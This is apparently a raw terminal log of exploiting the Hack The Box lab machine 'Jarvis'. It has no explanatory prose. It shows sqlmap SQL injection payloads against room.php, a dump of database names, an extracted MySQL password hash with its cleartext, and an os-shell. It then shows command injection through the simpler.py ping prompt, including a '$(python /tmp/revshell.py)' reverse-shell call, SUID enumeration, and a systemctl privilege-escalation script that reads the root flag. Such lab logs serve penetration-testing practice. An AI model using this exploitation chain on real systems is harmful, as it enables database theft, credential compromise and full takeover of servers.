http://jarvis.htb/room.php?cod=1

sqlmap identified the following injection point(s) with a total of 82 HTTP(s) requests:
---
Parameter: cod (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cod=1 AND 2757=2757

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: cod=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: cod=-5125 UNION ALL SELECT CONCAT(0x717a716a71,0x6f504e49776d6e684f416e7653684c726b62754354425a6e4d534e534e4b43786177564f4e44625a,0x71766b7171),NULL,NULL,NULL,NULL,NULL,NULL-- bGzC

---
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12


available databases [17]:                                      
[*] abdsl
[*] aze
[*] bream
[*] clgmg
[*] db_mk
[*] dbrql
[*] enderMan
[*] hack
[*] hotel
[*] information_schema
[*] kkk
[*] lhcif
[*] mysql
[*] performance_schema
[*] roewq
[*] skjzh
[*] Yeet

Database: mysql                                                
[29 tables]
+---------------------------+
| column_stats              |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| gtid_slave_pos            |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| index_stats               |
| innodb_index_stats        |
| innodb_table_stats        |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| roles_mapping             |
| servers                   |
| slow_log                  |
| table_stats               |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
+---------------------------+

root@kali:~/HTB/Jarvis# sqlmap -u http://jarvis.htb/room.php?cod=1 --users --passwords
database management system users [1]:
[*] 'DBadmin'@'localhost'

database management system users password hashes:
[*] DBadmin [1]:
    password hash: *2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
    clear-text password: imissyou




root@kali:~/HTB/Jarvis# sqlmap -u http://jarvis.htb/room.php?cod=1 --os-shell
os-shell> pwd
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:    '/var/www/html'
os-shell> 
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:    'www-data'

os-shell> uname -a
command standard output:    'Linux jarvis 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux'
os-shell> 
os-shell> sudo -l
command standard output:
---
Matching Defaults entries for www-data on jarvis:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
---
os-shell> ls -la /var/www/Admin-Utilities/simpler.py
command standard output:    '-rwxr--r-- 1 pepper pepper 4587 Mar  4 07:48 /var/www/Admin-Utilities/simpler.py'

os-shell> env
command standard output:
---
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
JOURNAL_STREAM=8:13324
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
INVOCATION_ID=8fa70cd1117643e8b175fe98b55d9c98
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html
---

os-shell> grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1 }'
command standard output:    'root'

$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/ 
                                @ironhackers.es
                                
***********************************************

Enter an IP: 127.0.0.1 $(cat /home/pepper/user.txt)
127.0.0.1 $(cat /home/pepper/user.txt)
ping: 2afa36c4f05b37b34259c93551f5c44f: Temporary failure in name resolution
$ pwd


Enter an IP: 127.0.0.1 $(python /tmp/revshell.py)
127.0.0.1 $(python /tmp/revshell.py)


$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/systemctl
/bin/umount
/bin/su
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper


pepper@jarvis:~/backoff$ bash privesc.sh 
bash privesc.sh
Created symlink /etc/systemd/system/tmp.sEkiCaAC3e.service -> /home/pepper/tmp.sEkiCaAC3e.service.
Created symlink /etc/systemd/system/multi-user.target.wants/tmp.sEkiCaAC3e.service -> /home/pepper/tmp.sEkiCaAC3e.service.
pepper@jarvis:~/backoff$ ls -a
ls -a
.  ..  privesc.sh  root.txt  systemctl
pepper@jarvis:~/backoff$ cat root.txt
cat root.txt
d41d8cd98f00b204e9800998ecf84271
pepper@jarvis:~/backoff$ 

